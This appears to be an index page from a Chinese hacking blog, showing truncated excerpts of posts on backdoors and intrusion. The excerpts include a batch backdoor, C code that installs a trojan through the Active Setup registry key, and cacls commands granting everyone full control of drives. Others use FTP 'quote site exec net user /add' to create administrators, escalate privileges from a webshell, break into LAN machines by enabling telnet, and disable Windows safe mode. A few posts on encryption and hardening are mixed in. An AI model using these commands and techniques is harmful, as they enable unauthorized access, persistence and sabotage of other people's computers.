分类: 网络安全 |

超强bat后门

神刀网

密码是:shendao代码如下:

//////////////////////////

查看更多...

Tags: 超强bat后门 bat后门

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6711

vc实现ACTIVEX 木马启动方式

#include "stdafx.h"
#define ACTIVE_SETUP "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{450D8FBA-AD25-11D0-98A8-0800361B1175}"
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7952
 【IT168 安全】多年来,如果公司想使得数据具备一个额外的安全度,他们可以选择性的使用加密技术。然而非强制性进行加密的日子已经一去不返了。现在,各行业的公司都受制于那些强制加密和其他安全标准的规章制度的限制,如果公司未能充分保护好他们的数据,将受到严厉的处罚。即使一个公司不受到这样规章制度的限制,许多法律还要求公司对那些未加密客户数据遭到破坏的安全攻击事件进行披露。 
  因此,这已经不再是公司是否应该使用加密技术的问题,而是一个公司应该如何对数据进行加密的问题。制定加密策略计划的第一步是理解主要的加密技术类型,包括存储加密技术、网络加密技术、应用程序级加密技术。虽然各种方法都有各自的优点,但它们也有不足的地方,我们也需要把这些因素考虑进去。

  权限管理

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 6264
【IT168 安全】现在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。 
  入侵测试第一步:扫描

  扫描是入侵的第一步,它可以让你对即将入侵的目标有一个全面的了解。同时扫描还有可能发现扫描对象的漏洞,为入侵提供一个指导方向。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5637

批处理学习完全教程

来源:脚本之家
  批处理文件,在MS-dos中,.bat文件是可执行文件,有一系列命令构成,其中可以包含对其他程序的调用。
  首先,批处理文件是一个文本文件,这个文件的每一行都是一条DOS命令(大部分时候就好像我们在DOS提示符下执行的命令行一样),你可以使用dos下的Edit或者Windows的记事本(notepad)等任何文本文件编辑工具创建和修改批处理文件。
  其次,批处理文件是一种简单的程序,可以通过条件语句(if)和流程控制语句(goto)来控制命令运行的流程,在批处理中也可以使用循环语句(for)来循环执行一条命令。当然,批处理文件的编程能力与C语言等编程语句比起来是十分有限的,也是十分不规范的。批处理的程序语句就是一条条的dos命令(包括内部命令和外部命令),而批处理的能力主要取决于你所使用的命令。
  第三,每个编写好的批处理文件都相当于一个DOS的外部命令,你可以把它所在的目录放到你的 dos搜索路径(path)中来使得它可以在任意位置运行。一个良好的习惯是在硬盘上建立一个bat或者batch目录(例如C:\BATCH),然后将所有你编写的批处理文件放到该目录中,这样只要在path中设置上c:\batch,你就可以在任意位置运行所有你编写的批处理程序。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5402

Autorun.inf的新写法与应用以及防御

首先是autorun.inf
一般的病毒的Autorun.inf文件内容为
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe
shell\1=Open

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5844

百度被黑原理,图解


[img]http://www.520hack.com/Article/UploadFiles/201001/20100114084702362.jpg[/img]
[img]http://www.520hack.com/Article/UploadFiles/201001/20100114084658308.jpg[/img]

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7202

关于3389的一些很少人知道的东西

关于3389的一些很少人知道的东西
3389是通俗上的说法,这是由于程序使用的端口为3389所以......书面上一般称为远程桌面连接。


查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7308

Cacls提权命令

Cacls[b]提权命令[/b]的参数:
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览

查看更多...

Tags: 权限 提权 命令

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9837

服务器溢出提权攻击的解决办法

在频频恶意攻击用户、系统漏洞层出不穷的今天,作为网络治理员、系统治理员虽然在服务器的安全上都下了不少功夫,诸如及时打上系统安全补丁、进行一些常规的安全配置,但有时仍不安全。因此必须恶意用户入侵之前,通过一些系列安全设置,来将入侵者们挡在“安全门”之外,下面就将最简单、最有效的防(Overflow)溢出、本地提供权限攻击类的解决办法给大家分享。 

  一、如何防止溢出类攻击 

  1、尽最大的可能性将系统的漏洞补丁都打完,最好是比如Microsoft Windows Server系列的系统可以将自动更新服务打开,然后让服务器在您指定的某个时间段内自动连接到Microsoft Update网站进行补丁的更新。假如您的服务器为了安全起见 禁止了对公网外部的连接的话,可以用Microsoft WSUS服务在内网进行升级。 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5681

经典的Webshell提权技术总结

说到花了九牛二虎的力气获得了一个webshell,  
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~  
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限  
****************************************************************************  
第一  

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5824

手工FTP提权

开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个

wscript.shell √ 命令行执行组件

在看看这里 开了终端了 有时候没开也会显示3389

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 8048

看紧你的3306端口,一次通过mysql的检测

用superscan扫了一下 
某个c类的网段,寻找开放80端口的机器,结果就只有一台机器 
开放了80端口,试着连了一下,是我们学校某个社团的的主页。 
从端口的banner来看应该是apache(win32),证实一下 
telnet 211.87.xxx.xxx 

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7969

只开80端口主机的安全检测

扫描:先用x-scan2.3扫端口晕只开80,然后又扫了一遍唉还是一样的结果,看来管理员也不算笨啊!  
检查系统洞洞:先ping了一下竟然ping不通,不过有刚才的扫描结果就很明白了应是iis5再加上网页上明显用的asp这样的主机当然是win2k不用说咯.  
分析:唉也没什么可以分析咯只能从80入手,看看上面都有些什么东东有一个查询系统输入单引号试试,返回错误类型:  
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)  
/mingce/student1.asp, 第 30 行  

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5722
【 网友提问】最近家里安装了2M ADSL,使用起来速度不错。不过令我奇怪的是最近一次下载发现传输速度非常高,已经大大高于2M ADSL应该有的带宽——280K每秒,而且这种超速现象一直持续直到我将500多M的文件传输完毕。在传输或下载其他程序或软件时就没有这么好的速度了。 

    为了弄清楚这个疑难问题我咨询了一些朋友有的说是电信或网通等接入服务提供商的设备没有限制速度,也有的朋友说是提供商设备出错造成的,还有的朋友说这个速度不是真实的速度而是错误的不准确的,本人想请专家彻底详细的解释下此问题,相信不少读者也遇到了类似问题。具体的速度截图我已经一并发给你们,请查收,万分感谢。
[img]http://www.520hack.com/Article/UploadFiles/200811/20081102105232938.jpg[/img]
专家解答:首先我们来看下这位读者的网络使用环境,其网络类型是ADSL,带宽是2M,按照我们最常用的换算关系求得2M带宽对应的真实速度应该是260K每秒,最高理论峰值也不会超过300K每秒。然而我们从这位网友提供的图象可以清晰的看到速度达到了1M每秒,这显然大大高于理论值和其他2M ADSL用户的带宽传输速度。那么到底是什么原因造成ADSL超速呢?我们主要从以下几个方面来分析。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 5889

windows局域网的一个经典的入侵方法

4年前我用的东西了,可能大家比较老了,不过也许现在还是能用上的,不过大家不妨试验一下很有趣的。
  点我的电脑右键单机管理,然后点操作底下的=》连接到另外一个计算机。输入对方ip
  或者你不知道对方ip 可以这样,点浏览高级里的立即查找,就可以显示本局域网工作组内的计算机了。然后双击你要进入的电脑,呵呵一般局域网的计算机密码是一样的,所以不需要NTLM验证,不过那个验证比较老了,现在不知道还有没有人会用,进入后然后点服务和应用,找到telnet服务,然后开启对方telnet服务,如果没有进入这些界面或者服务出错是因为对方没有开rpc服务,当然还是选择放弃吧, 如果按照刚才步骤成功,那恭喜你已经得到一个进入对方计算机的通道了。
  然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了,当然这里有个小技巧,如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名,然后点鼠标右键 标记你要的计算机名字选中 按下回车就复制到cmd的剪切板里了, 然后用ping命令 ping 粘贴你刚才复制的内容(直接点右键就出来了) 然后就能看到你ping的ip了。
  进入对方计算机该后该怎么做呢。 呵呵 很多黑客教程好像没有具体告诉我们下一步我们该怎么办吧 嘿嘿。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 9355

ftp命令ftp quote site exec的使用

在获得服务器FTP管理员后可以用[b]quote site exec[/b]命令来添加系统管理员,cmd下操作方法如下:[b]quote site exec[/b] net user 用户名 密码 /add 添加一个用户

[b]quote site exec[/b] net localhost administrators 用户名 /add 把用户添加到系统管理员组

[b]quote site exec[/b] tskill PID 在 Windows 2003 中通过 PID 关闭进程

查看更多...

Tags: ftp 命令

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 13580

破坏安全模式

作者:乱雪  http://hi.baidu.com/lu4nx
参考AV终结者写的一个小函数,直接删注册表的内容,方法很简单,不过网上很少看到有这方面的资料,恢复起来也容易:) 
/*
破坏安全模式,by:乱雪
2010.1.24

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7174

Autorun.inf的新写法与应用以及防御

首先是autorun.inf
一般的病毒的Autorun.inf文件内容为
[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe
shell\1=Open

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7511

ActiveX 部件不能创建对象

下面就是开启和关启FSO控件的方法 windows98系统 在DOS命令行状态输入以下命令: 关闭命令:RegSvr32 /u C:\WINDOWS\SYSTEM\scrrun.dll 打开命令:RegSvr32 C:\WINDOWS\SYSTEM\scrrun.dll win2000系统: 在CMD命令行状态输入以下命令: 关闭命令:RegSvr32 /u C:\WINNT\SYSTEM32\scrrun.dll 打开命令:RegSvr32 C:\WINNT\SYSTEM32\scrrun.dll  win2003:运行regsvr32 scrrun.dll即可。 如果想关闭FSO组件,请运行 regsvr32 /u scrrun.dll即可。

查看更多...

分类:网络安全 | 固定链接 | 评论: 0 | 查看次数: 7456